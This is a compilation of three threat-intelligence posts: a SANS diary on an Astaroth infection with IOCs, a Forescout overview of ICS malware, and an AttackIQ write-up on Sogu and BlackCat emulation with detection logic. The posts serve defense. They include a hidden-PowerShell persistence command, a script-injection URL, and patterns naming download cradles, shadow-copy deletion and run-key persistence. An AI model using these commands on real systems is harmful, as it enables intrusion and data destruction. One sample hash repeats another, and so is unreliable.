(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

Today’s diary is a quick post of an Astaroth (Guildma) malware infection I generated todayy on Friday 2022-08-19 from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA.  Boleto is a payment method used in Brazil, while Grupo Solução & CIA is Brazil-based company.

Images from the infection


Shown above:  Screenshot of the malicious email with link to download a malicious zip archive.


Shown above:  Link from email leads to web page pretending to be from Docusign that provides malicious zip archive for download.


Shown above:  Downloaded zip archive contains a Windows shortcut and a batch file.  Both are designed to infect a vulnerable Windows host with Astaroth (Guildma).


Shown above:  Traffic from the infection filtered in Wireshark (part 1 of 3).


Shown above:  Traffic from the infection filtered in Wireshark (part 2 of 3).


Shown above:  Artifact from the infected host’s C:UsersPublic directory.


Shown above:  Artifact on the infected host’s C: drive at C:J9oIM9JJ9oIM9J.jS.


Shown above:  Windows shortcut in the infected user’s RoamingMicrosoftWindowsStart MenuProgramsStartup directory to keep the infection persistent.


Shown above:  Directory with persistent files used for the Astaroth (Guildma) infection.


Shown above:  Astaroth (Guildma) performs post-infection data exfiltration through HTTP POST requests.

Indicators of Compromise (IOCs)

Link from email:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloud

IP address and TCP port for initial malicious domain:

172.67.217[.]95 port 80 – w7oaer.infocloudgruposolucaoecia[.]link

URL to legitimate website generated from iframe in the above traffic:

hxxp://www.intangiblesearch[.]it/search/home_page.php?db_name=%3Cscript%20src=%22https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js%22%3E%3C/script%3E%3Cscript%20type=%22text/javascript%22%20src=%22hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036%22%3E%3C/script%3E?

Traffic to initial malicious domain that provides zip archive download:

hxxp://w7oaer.infocloudgruposolucaoecia[.]link/P05dWVqI0WghlU4/UeWgmk3mU3p8yeyxkUgI8Um1R1/65837/gruposolucaoeciainfocloudAvDk.T036
hxxp://w7oaer.infocloudgruposolucaoecia[.]link//inc.php?/gruposolucaoeciainfocloud
hxxp://w7oaer.infocloudgruposolucaoecia[.]link/YBZJPTBQV/482NJ8NS74J9/N6D6WW/gruposolucaoeciainfocloud_097.88933.61414z64y64

Traffic generated by Windows shortcut or batch file from the downloaded zip archive:

172.67.212[.]174:80 ahaaer.pfktaacgojiozfehwkkimhkbkm[.]cfd GET /?1/
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?59792746413628799
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?59792746413628799
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?33954141807632999
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?33954141807632999
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?71576927405639060
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?71576927405639060
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?59784568396678051
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?59784568396678051
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?40018133101693668
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?40018133101693668
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs HEAD /?33450285101613952
104.21.11[.]4:80 cteasc.ijnkwnkxeguxaxmldwyogggwfk[.]sbs GET /?33450285101613952

Data exfiltration through HTTP POST requests:

104.21.25[.]34:80 hcu11m2mkk2.rouepcgomfhejergdahjcfcugarfcmoa[.]tk POST /
172.67.165[.]46:80 j2vfrc7gddo.aeabihjpejprueuibdjmhfmdcpsfr[.]gq POST /

Example of downloaded zip archive:

SHA256 hash: f254f9deeb61f0a53e021c6c0859ba4e745169322fe2fb91ad2875f5bf077300

File size: 1,091 bytes
File name: gruposolucaoeciainfocloud_097.88933.61414.zip

Contents from the above zip archive:

SHA256 hash: 5ca1e9f0e79185dde9655376b8cecc29193ad3e933c7b93dc1a6ce2a60e63bba

File size: 338 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.cmd

SHA256 hash: db136e87a5835e56d39c225e00b675727dc73a788f90882ad81a1500ac0a17d6

File size: 1,341 bytes
File name: gruposolucaoeciainfocloud_097.88933157.086456.45192.lNk

Command from Windows shortcut in Windows Startup folder on the infected Windows host:

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden -Command C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log

Files used for persistent infection:

SHA256 hash: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

File size: 893,608 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.exe
File description: Windows EXE for AutoIt v3, not inherently malicious

SHA256 hash: e31658734d3e0de1d2764636d1b8726f0f8319b0e50b87e5949ec162ae1c0050

File size: 246,116 bytes
File location: C:W45784602214Asus.CertificateValidation.2022.1728.641.AutoIt3.log
File description: Malicious data binary, AutoIt v3 compiled script run by above Windows EXE for AutoIt v3

Final words

A pcap of the infection traffic, the associated malware/artifacts, and the email that kicked off this infection are available here.

Brad Duncan
brad [at] malwre-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

In our new threat briefing report, Forescout’s Vedere Labs presents the most detailed public technical analysis of Industroyer2 and INCONTROLLER (also known as PIPEDREAM), the newest examples of ICS-specific malware that were disclosed to the public almost simultaneously, on April 12 and 13. Thankfully, both Industroyer2 and INCONTROLLER were caught before causing physical disruption.

Although there have been previous reports about both malware families analyzed in this research, we present the following new contributions:

Description of a functionality in Industroyer2 to discover the target’s Common Address of ASDU. Despite not being used in the analyzed sample, given its hardcoded configuration, this might have been used in previous reconnaissance stages to gather information about the target.
An analysis of the similarity of the IEC-104 implementation in Industroyer that reveals it is probably a modified version of a publicly available implementation.
The most detailed public description so far of Lazycargo, a part of INCONTROLLER that became publicly available recently and is used to execute other parts of the malware.

In this post, we detail how Forescout helps to protect against the new malware. The full report also contains a list of indicators of compromise (IOCs) and recommended mitigations.

Overview of the new ICS-specific malware

Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 industrial protocol. INCONTROLLER is a full toolkit containing modules to send instructions to or retrieve data from ICS devices using industrial network protocols such as OPC UA, Modbus, CODESYS, Machine Expert Discovery and Omron FINS. Additionally, Industroyer2 has a highly targeted configuration, while INCONTROLLER is much more reusable across different targets.

ICS-specific malware is still very rare compared to commodity malware such as ransomware or banking trojans. Industroyer2 and INCONTROLLER follow previous known examples such as Stuxnet, Havex, BlackEnergy2, Industroyer and TRITON, shown in the timeline below.

 

Industroyer2 is believed to be developed and deployed by the Sandworm APT, linked to the Russian GRU, which was behind the original attacks on the Ukrainian power grid in 2015 and 2016. The Industroyer2 incident follows recent activity against the APT in 2022, such as the disruption of the Cyclops Blink botnet. There is still no conclusive evidence about the actors behind INCONTROLLER, their motives or objectives.

Both new malwares show that abusing often insecure-by-design native capabilities of OT equipment continues to be the preferred modus operandi of real-world attackers. Vedere Labs recently disclosed a set of 56 insecure-by-design vulnerabilities in OT equipment called OT:ICEFALL, which included Omron controllers that were targeted by INCONTROLLER. The emergence of new vulnerabilities and new malware exploiting the insecure-by-design nature of OT supports the need for robust OT-aware network monitoring and deep packet inspection capabilities.

For more information and technical analysis, read the full report.

Read the Full Report

Mitigation recommendations for ICS malware

Forescout eyeInspect customers can follow the recommendations below to help ensure they are protected against Industroyer2 and INCONTROLLER.

Stay current with the release of additional content such as scripts and IOCs on the OT Portal or through your Forescout representatives.
Monitor network exposure for control systems and HMIs.
Monitor connections to devices outside of documented norms for the device and environment, with special attention to HTTP and Telnet connections to these devices.
Monitor unauthorized Telnet connection attempts, including the use of default credentials.
Detect ICMP usage and especially possible ping sweeps through the ICMP indicators in the Industrial Threat Library devoted to detect possible port scans and discoveries.
Apply additional configurations on eyeInspect to perform intrusion detection on known nodes. Available approaches include protocol blacklisting and communication whitelisting with traffic rules.
Leverage the Threat Detection Add-Ons script, which contains additional checks for lateral movement and user account manipulation that may reveal attempts to gain administrative rights.
Closely monitor the protocols abused by both new malwares for signs of anomalies: IEC-104 (2404/TCP), OPC UA (4840/TCP, 4843/TCP), Modbus (502/TCP), Machine Expert Discovery (27126/UDP, 27127/UDP), CODESYS (1740-1743/UDP, 11740-11743/TCP, 1105/TCP) and Omron FINS (9600/TCP, 9600/UDP) . Below, are specific recommendations for each protocol in eyeInspect.

IEC-104

eyeInspect has extensive coverage of IEC-104 anomalies with malformed packet detection (possible indicator of exploit), anomaly baselining detection and a vast Industrial Threat Library covering anomalous behaviors, dangerous operations and much more.

OPC UA

Monitor the alerts and events related to the OPC UA protocol. eyeInspect offers dozens of events related to anomalies like credential bruteforcing, bad certificate usage, anomalous connection attempts, configuration changes and changes to OPC UA tags.
Monitor OPC UA connections, especially newly established or anomalous OPC UA connections through dedicated filters, analytics, maps and the change logs.

MODBUS/Schneider Electric

Monitor the alerts and events related to the MODBUS protocol. eyeInspect offers dozens of events related to anomalies like error codes associated with abnormal device crashes/reboots, files uploaded or downloaded, file deletion, unauthorized changes in device configuration and execution of commands.
Add an anomaly detection-specific blacklisting rule on ports 27126 and 27127 that target IP broadcast 255.255.255.255, to identify the Machine Expert Discovery protocol used in the initial phase. (A premade profile is available on request through Forescout representatives or Customer Support.)
Install the new Device and Visibility Addons Script 3.2 (or newer) to detect and vet devices using this discovery protocol.

OMRON FINS

Implement the OMRON FINS Monitor script to receive more alerts and details about unauthorized changes in device configuration and execution of commands, files uploaded or downloaded and tons of other anomalies (available on request through Forescout representatives).

The post Industroyer2 and INCONTROLLER: New Findings and How Forescout Protects Against the Most Recent ICS-Specific Malware appeared first on Forescout.

cybercenter-1200x630-e_1.jpg

Malware often forms the foundation for an adversary cyberattack, giving adversaries a means to employ a range of tactics, techniques, and procedures (TTPs) against a target to achieve their strategic objectives. For analysts, adversary malware also provides insights into an adversary’s behavior when more complete incident response data is unavailable, particularly at the procedure level. Defenders can then improve their security posture by testing their defenses against the malware advance. But only if the assessment can be done easily.

Attack graphs give us a means of arranging real-world malware into its component TTPs to run emulations, and today we are immensely excited to announce our new malware emulation attack graphs.

How do we build it? AttackIQ’s adversary research team analyzes real-world malware and then arranges the TTPs into a logical flow that emulates specific adversary behaviors. The resulting attack graph gives you a cornerstone of hard data – a detailed adversary emulation – to run against your security program and test your defense performance.

What sets malware emulation attack graphs apart from AttackIQ’s other attack graphs is their focus on the TTPs made possible by the malware itself (rather than in an entire adversary intrusion sequence, which could include manual TTPs). Often in incident reports, malware TTPs are either unknown or not understood. Analysts often don’t know whether the TTPs reported in an incident are features of the malware itself, or if they are employed by an intruder manually. AttackIQ’s malware emulation attack graphs focus on key aspects of malware used across many campaigns. They give defenders the opportunity to validate and tune their endpoint security controls and network security controls against each logical stage of a specific malware strain.

Specifically, a malware-based threat assessment helps defensive teams to:

identify core behavior observed in specific malware samples
identify the security technologies that can detect and prevent behaviors in specific malware samples
evaluate the efficacy of defensive technologies (and the overarching security stack) in detecting and preventing specific malware behaviors; and
identify gaps in the team’s security posture that could be filled or improved to detect and prevent specific TTPs.

To kick off these new attack graphs, we chose the ever-prevalent Sogu (a.k.a. PlugX) remote access tool (RAT) and the recent Rust-based ransomware, BlackCat (a.k.a. ALPHV). We will cover these new additions to the AttackIQ Security Optimization Platform in a live demo on May 26, 2022 at 10.000 hrs PT.

Sogu (PlugX)

Sogu (a.k.a. PlugX) is a full-featured, modular RAT with many variants and is used by multiple China-based groups within the espionage threat class, to include APT41, APT10, UNC124, Mustang Panda, and others. Sogu has been around for more than a decade with early reporting as far back as 2008, yet it continues to target victims around the world, to include the semiconductor industry and nation-state governments.

Our Sogu/PlugX attack graph is derived from a sample used in an intrusion by China-based threat actors that targeted the semiconductor and high-tech subsector of the manufacturing industry in July 2020.

This sample was delivered in a self-extracting (SFX) RAR file which contains three files required to implement a DLL side-loading method of execution. When this SFX RAR file is opened by an unwitting user, these files are written to disk and the executable is run.

Legitimate kick-off executable (in the sample analyzed this was a McAfee program).
Hijacked DLL that loads/launches Sogu/PlugX (this DLL is considered hijacked because the legitimate program will natively load the DLL).
Encrypted file holding encrypted Sogu shellcode payload.

This method and required set of files is commonly seen with Sogu/PlugX variants.

Metadata from the sample analyzed

Description: SFX RAR file
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Description: Legitimate exe file
Size (bytes): 140576
SHA1: d201b130232e0ea411daa23c1ba2892fe6468712

Description: Hijacked DLL, loads the payload file
Size (bytes): 199168
SHA1: 040ae092a0ab8801a92c4d0d533a03ce13595e1f

Description: Encrypted payload file
Size (bytes): 121128
SHA1: eb9f611889ef99c7b0c4006e1dea50dd5a8c7f93

This attack graph focuses on the sample’s core TTPs, captured by the following scenarios that emulate behavior as the malware progresses through its code execution.

Attack Graph SoguClick for Larger View

Scenarios 1 and 2: Initial Access: Spearphishing (T1566.002): Sogu is commonly delivered to targets using spearphishing links. For the first scenario in the graph, we begin with the step after a link was clicked by downloading the SFX RAR file package to the endpoint, giving A/V and potentially network security controls the opportunity to detect and or prevent delivery.

1a. Detection Process

Parent Process Name == (Winword.exe OR Excel.exe OR Powerpnt.exe)
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((“DownloadString OR DownloadFile) AND HTTP AND (Invoke-Expression OR IEX)

1b. Mitigation Policies

MITRE recommends the following mitigations for T1566.002:

M1047
M1021
M1054
M1018
M1017

Scenario 3: Save Malicious DLL to Disk: If the SFX RAR file is successfully opened, the trio of files will be written to the victim’s disk. Of these three files, the malicious DLL gives another opportunity to test A/V protection since it isn’t obfuscated like the encrypted Sogu shellcode payload file. This scenario saves the constituent hijacked DLL to disk, mimicking the SFX RAR file’s write operation to the host machine.

3a. Detection Process

While A/V, NGAV and EPP security controls excel at detecting malicious files being saved to disk, Application Control technologies provide opportunities to detect unsigned DLLs being saved to disk. Further, execution of unsigned filetypes (such as DLLs) specified in your Application Control policies can prevented/blocked. Additionally, EDR technologies have the ability to detect these unsigned filetypes being saved to globally writable directories on devices. However, the latter may be false positive prone and lead to excessive alerts. In addition to looking for unsigned DLLs being placed in globally writable directories, using YARA detections to look for strings in malware files is an alternate/effective way of detecting this activity on your endpoints:

PlugX / Sogu YARA Rules

3b. Mitigation Policies

Ensure that devices are placed within a protective (not detective) antivirus policy to act on files through static and dynamic analysis.
Ensure account management is correctly configured through group policy, ensuring proper users only have rights to write to sensitive areas on disk.
Ensure application control technology policies are thought-through, tuned and maintained; you can get very granular with what types of files are indexed and can execute on which systems in your network. For example, self-extracting RAR files can be banned entirely on your network, or unsigned DLLs can be prevented from executing. Attempted execution of banned files is logged and can flow into your SIEM for further alerting or correlation.

Scenario 4: Hijack Execution Flow: DLL Side-Loading (T1574.002): Once the three files are written to disk, the SFX RAR file automatically runs the legitimate McAfee executable leading to DLL side-loading technique. In DLL side-loading, the legitimate binary attempts to load a required DLL and instead of loading the normal benign DLL, a hijacked version is loaded because it resides in the same directory as the McAfee executable.

4a. Detection Process

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the DLL) extracted from the RAR file. This binary name is subject to change
Imageload is_signed == False

4b. Mitigation Policies

MITRE recommends the following mitigations for T1574.002:

M1013
M1051

Additionally, if the legitimate file that is used to load a DLL is not a binary needed for your organization, add the hashes to your application control block lists as soon as possible. Binaries on a block list will not be able to execute even if they are benign by nature.

Scenario 5: Process Injection (T1055.001): Sogu uses process injection both reflectively and remotely to evade defenses. Malicious code can sometimes go undetected by security products because it is running inside a legitimate process. Our emulation mimics DLL code injection by using Windows API calls to LoadLibrary and CreateRemoteThread to inject code into a legitimate process.

5a. Detection Process

Utilize tools such as Procmon.exe or EDR tools to monitor for system Windows API calls such as “LoadLibrary” and “CreateRemoteThread” with unsigned or unrecognized binaries, especially if they are coming from locations that are globally writable or not belonging to the associated injected process.

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the .dll extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

5b. Mitigation Policies

MITRE recommends the following mitigations for T1055.001:

M1040

Scenario 6: Persistence via Windows Service (T1543.003): If the malware executes with elevated privilege, persistence is established by creating a new service that will initiate the execution of the benign McAfee binary, starting the process of malicious code execution again.

6a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((‘sc’ or ‘sc.exe’) AND ‘create’ AND ‘binpath=”<path to trusted executable>”’ AND start=”auto”)

6b. Mitigation Policies

MITRE recommends the following mitigations for T1543.003:

M1047
M1040
M1045
M1028
M1018

Scenario 7: Persistence via Registry Run Key (T1547.001): Alternatively, if the malware is executed as a normal user, persistence is achieved using a standard registry run key. Our attack graph will take this persistence path if the service creation is prevented in the previous scenario.

7a. Detection Process

As registry key modifications is typical for Windows system behavior, it is unusual if you observe registry actions attempted to be carried out by unexpected or underprivileged users. This detection will exclude administrative or expected users to reduce false positives from expected system usage.

Process Name == (cmd.exe or powershell.exe)

User NOT IN <list of expected reg.exe users>

Command Line CONTAINS((reg or reg.exe) AND (“HKEY_CURRENT_USER” OR “KEY_CURRENT_MACHINE”) AND “SOFTWAREMicrosoftWindowsCurrentVersion” AND (“run” OR “runonce”))

7b. Mitigation Policies

Although it is expected Windows behavior for this registry key to be modified for programs to start at boot, modification to these registry keys can be constrained by setting group policy and application control/whitelisting but allowing only authorized users to utilize tools such as cmd.exe, powershell.exe, reg.exe, and regedit.exe

Scenario 8 and 9: Command and Control: DNS (T1071.004): After persistence is set, the malware establishes communication with command and control (C2) infrastructure by abusing the Domain Name System (DNS) application layer protocol to avoid detection/network filtering.

This Sogu sample is configured to send DNS callouts in TXT records that carry encoded victim information prepended to the threat actor-controlled domain. Example:

ENCODEDDATA.ENCODEDDATA.ENCODEDDATA.badSubdomain.badDomain.bad

An initial DNS request is sent through a hardcoded public Google DNS server, 8.8.8.8, which we assess to be a way around potential internal network DNS blacklisting implemented by the victim organization’s security team.

If the Google DNS resolution fails, potentially due to web proxy or DNS policy disallowing external DNS requests, a fallback callout that is identical in content is sent to the host’s default DNS server. Our scenario emulates the structure of the encoded data in these callouts and is sent to AttackIQ infrastructure. This provides defenders the opportunity to build network detections for anomalous DNS traffic like this, which could prove useful beyond Sogu detection.

8a. Detection Process

Typically, C2 traffic is sent through HTTP/HTTPS which is often monitored by network firewalls and content filtering security controls. Threat actors using Sogu/PlugX utilize the DNS protocol to remain undetected. Creating network Snort rules to alert on any UDP 53 connections to flagged IPs may be an effective way to alert on possible C2 activity from threat actors utilizing this technique.

alert udp any 53 -> $HOME_NET any (msg:”*”; rev:001; content:”|43 D7 41 85|”;)

Please note, the content portion here is a hash representation of the destination IP address for the DNS request (i.e., to the C2). This portion should be modified as IP artifacts are collected.

8b. Mitigation Policies

MITRE recommends the following mitigations for T1071.004:

M1037
M1031

Scenario 10: Input Capture: Keylogging (T1056.001): With the C2 channel established, the running implant can now receive commands or Sogu plugins enabling additional capability from the external C2 server. One of the most common commands received is the enabling of keylogging functionality. The scenario uses a system hooking routine to capture any keystrokes using calls to the Windows API.

10a. Detection Process

MITRE detection recommendations for T1056.001:

DS0009
DS0027

Scenario 11: Windows Command Shell (T1059.003): Another post-exploitation behavior of Sogu is the use of the Windows command shell for execution of reconnaissance commands. If the keylogger activity in the previous scenario is prevented by security controls, a command shell is initiated and the following commands are executed: ipconfig, whoami, systeminfo

11a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS “systeminfo”
User NOT IN User != [<list of expected administrators to be issuing these commands>]

11b. Mitigation Policies

MITRE mitigation Recommendations for T1059.003:

M1038

Additionally, ensure that Group Policy is set and enforced to allow only authorized users/administrators to be able to run cmd.exe or powershell.exe. These interpreters can be limited to lower privileged or unneeded users to prevent enumeration or abuse.

Scenario 12: Data Exfiltration Over HTTP (T1048.003): In our final technique of the attack graph, we emulate exfiltration of data over HTTP by compressing mocked data and transmitting to an AttackIQ controlled server.

12a. Detection Process

MITRE detection Recommendations for T1048.003:

DS0017
DS0022

12b. Mitigation Policies

MITRE mitigation Recommendations for T1048.003:

M1057
M1037
M1031
M1030

BlackCat (ALPHV) Ransomware

BlackCat (a.k.a ALPHV) emerged as ransomware-as-a-Service (RaaS) as early as mid-November 2021, providing would-be attackers with a highly configurable multi-platform ransomware strain written in Rust. BlackCat operators use the double-threat extortion model which not only encrypts victim data but also threatens public exposure of sensitive information that was collected and exfiltrated prior to ransomware deployment.

According to an April 2022 FBI report, BlackCat has compromised at least 60 organizations worldwide through March 2022. True to the nature of RaaS, victim sectors are wide ranging, and have been reported to include German oil, European port authorities, high-end fashion/apparel, and higher education institutions in the United States.

The sample analyzed for our content development was obtained from a known public malware repository and was first submitted to VirusTotal in December 2021.

Sample Metadata

Description: BlackCat.exe (Win32)
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Our BlackCat attack graph emulates a series of core behaviors beginning with introducing the ransomware to the environment, moving through configuration of the host for efficient and effective encryption, preparation for propagation, and finally to BlackCat’s ransomware encryption method.

Attack Graph BlackCatClick for Larger View

Scenarios 1 and 2: Ingress Tool Transfer (T1105): Intruders bring BlackCat into a victim environment after it has been breached. To begin this attack graph, we assume that initial access has been achieved and we emulate the introduction of the ransomware to the endpoint. This pair of scenarios downloads and saves a Windows-based BlackCat sample to disk, giving A/V security controls an opportunity to detect inbound tool delivery, as well as uploads to memory.

1a. Detection Process

Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)

Certutil Example:

Process Name == Certutil.exe
Command Line Contains (“-urlcache” AND “-f”)

Bitsadmin Example:

Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)

Curl Example:

Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)

1b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Additionally, it is advised that non administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This will prevent malicious usage of these tools on end user accounts.

Scenario 3: Windows Management Instrumentation (WMI) Commands (T1047): One of the first things BlackCat does is grab the host machine’s Windows UUID which is used to build a unique victim identifier for the ransom process. The malware retrieves this piece of information by using a living-off-the-land tool, WMI, to issue the following command “csproduct get UUID”.

3a. Detection Process

Developing a baseline of typical binaries that wmiprvse.exe invokes in your environment, then utilizing that baseline to make a detection is a good step in monitoring abnormal Windows Management Instrumentation activity. For example, creating a detection to alert on processes not in a list of known processes being invoked from wmiprvse.exe would identify possible malicious activity.

Monitoring the endpoint for the following would also alert on possible suspicious use:

Process Name == wmic.exe
Command Line CONTAINS (“Process call create” AND(“.dll” OR “.exe”))

3b. Mitigation Policies

MITRE mitigation Recommendations for T1047:

M1040
M1038
M1026
M1018

Additionally, ensure only administrators are authorized to utilize the Windows Management Instrumentation as this tool may be utilized for enumeration, lateral movement, and command execution as seen in this scenario.

Scenario 4: Impair Defenses: Disable or Modify Tools (T1562.001): Here, we implement a new custom scenario that emulates BlackCat’s attempt to allow Remote Symbolic Links on the host using the fsutil command. Enabling these remote symbolic links can expand access to remote file locations for encryption as well as create additional pathways for propagation.

4a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (“fsutil” AND “SymlinkEvaluation” AND (“R2L:1” OR “R2R:1”))

4b. Mitigation Policies

MITRE mitigation Recommendations for T1562.001:

M1022
M1024
M1018

Scenario 5: Modify Registry (T1112): In this scenario we emulate BlackCat’s addition of a registry key that maximizes concurrent network requests made by the host, likely to prevent any hiccups during file encryption of remotely available files. The “MaxMpxCt” key is set to 65535.

5a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“reg” OR “reg.exe”) AND “add” AND “HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters” AND “/V MaxMpxCt”)

5b. Mitigation Policies

MITRE mitigation Recommendations for T1112:

M1024

Scenario 6: File Deletion: Volume Shadow Copy (T1070.004): Using the Windows command shell, this scenario reproduces the deletion of Volume Shadow Copies. BlackCat and other ransomware lines make use of this technique to restrict the victim’s ability to restore the encrypted files from backup.

6a. Detection Process

Process Name == vssadmin.exe
Command Line CONTAINS (“delete shadows“)

6b. Mitigation Policies

It is recommended that group policy settings and Application Control/whitelisting software is set to only allow authorized users access to tools such as vssadmin.exe, cmd.exe, and powershell.exe to prevent misusage if an account is compromised.

Additionally, ensure that backup files are set to only be accessed by authorized personnel. These backup files should not have read or write access to underprivileged user accounts.

Scenario 7: System Network Configuration Discovery (T1016): If configured, BlackCat will propagate on a victim’s local network. In order to spread itself to neighbor machines, discovery actions are needed to identify pathways available from the origin host. Network topology data points are obtained with a copy of BlackCat’s network share discovery and MAC address snooping with “arp” commands.

7a. Detection Process

Typically, system enumeration is carried out by using benign, Windows applications. This allows an attacker to gain additional information about the target environment without setting off alarms by using malware or possibly AV flagged software. Since these techniques are utilized by benign Windows processes, the following detections should be taken into account with expected users like network administrators to reduce false positives:

Enumeration through “net” command

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“net“ OR “net.exe”) AND “use”)
User NOT IN <list of expected net.exe users>

Enumeration through “arp” command

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (arp -a)
User NOT IN <list of expected network admins>

7b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have an account compromised. To reduce this information disclosure, cmd.exe and powershell.exe should be excluded to only necessary administrative users.

Additionally, Windows command line Audit Process Creation auditing can be enabled to see event ID 4688. Enable the GPO setting to “include command line in process creation events.” Windows CLI events can be filtered and forwarded to a SIEM from all endpoints for further filtering, tuning and correlation for detection of anomalous activity.

Scenario 8: Ingress Tool Transfer (T1105): BlackCat carries a copy of the PsExec utility in its resources that is written to disk and likely used to spread itself if configured for propagation. In the sample we analyzed propagation is not enabled, however we included this behavior because it is a configurable option and a tool commonly abused by attackers to achieve various results including moving files over the network and remote process execution.

8a. Detection Process

PsExec is not malicious by nature and is signed by Microsoft as it is a Microsoft published SysInternals tool. This tool may be used maliciously to move laterally on devices within a network, and should be monitored for authorized usage only. If this is not an expected binary in your environment for network administrators to utilize, then we recommend monitoring for this file periodically to see if any have been placed on the system without approved intent. PsExec with alternate credentials specified on the command line is a Logon Type 3+2 event and it should be noted that this passes those credentials in plaintext across the network as well as leaves those credentials vulnerable to theft on the target host. PsExec usage without explicit credentials is a Type 3 Logon event and does not leave any credentials on the target host.

8b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Even legitimate usage of PsExec is still problematic from a security perspective. For the best security, PsExec should be globally banned from execution using Application Control/whitelisting software. Sys Admin or authorized usage of PowerShell Remoting is a much more secure and preferred option for legitimate Type 3 Logons in your environment and does not leave credentials on the target host.

Scenario 9: File and Directory Discovery (T1083): At this stage of the kill chain, BlackCat preps for file encryption by enumerating the filesystem searching for data to encrypt.

9a. Detection Process

Searching the file system on Windows machines is typically done through the CLI with the use of the “dir” command. This is typical Windows behavior, but monitoring for this behavior may help identify malicious actions in your environment. Often enumerated behavior on endpoints is sent to a file for exfiltration and examination by the attacker:

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((“dir“ AND “>”)

Please note, this detection can be very loud if end users or administrators commonly search the file system and save results with the “>” argument. To narrow this detection down, add in sensitive file paths that are not often viewed by typical end users to increase fidelity.

9b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have an account compromised. To reduce this information disclosure, cmd.exe and powershell.exe should be excluded to only necessary administrative users.

Additionally, ensure that files and directories have proper permissions assigned to prevent unauthorized viewing or modification by underprivileged users.

Scenario 10: Data Encrypted for Impact (T1486): In our last step of the attack graph, we mimic BlackCat’s encryption method implementing 128-bit AES-NI in CTR mode if supported by the host hardware and falling back to ChaCha20 if not. In addition to the specific encryption algorithm, we also emulate parts of the unique encryption process used by BlackCat.

One of these steps is the use of a temporary checkpoint file written to disk, that serves as a position marker if file encryption is interrupted. A checkpoint file is written to disk for each file during the encryption process and then removed once the file has been fully encrypted. The name of this file is the name of the file being encrypted with the string “checkpoints-” prepended to it. This is a unique IOC and could be used in a detection signature.

Another nuance we’ve captured in the encryption scenario is BlackCat’s file extension exclusion list. The configuration block of BlackCat specifies file names, directories, and extensions to exclude from encryption, ensuring the host remains stable during the process and reducing the number of files to encrypt if they provide no ransom value.

We’ve also taken care to emulate the structure of the file after encryption including an encrypted block of JSON that contains the private key and other metadata required to decrypt the file.

10a. Detection Process

A detection rule could be written to catch the checkpoint file written to disk during the encryption process:

FileName starts_with “checkpoints-”

In addition, Blackcat Ransomware group searches for the following extensions to encrypt:

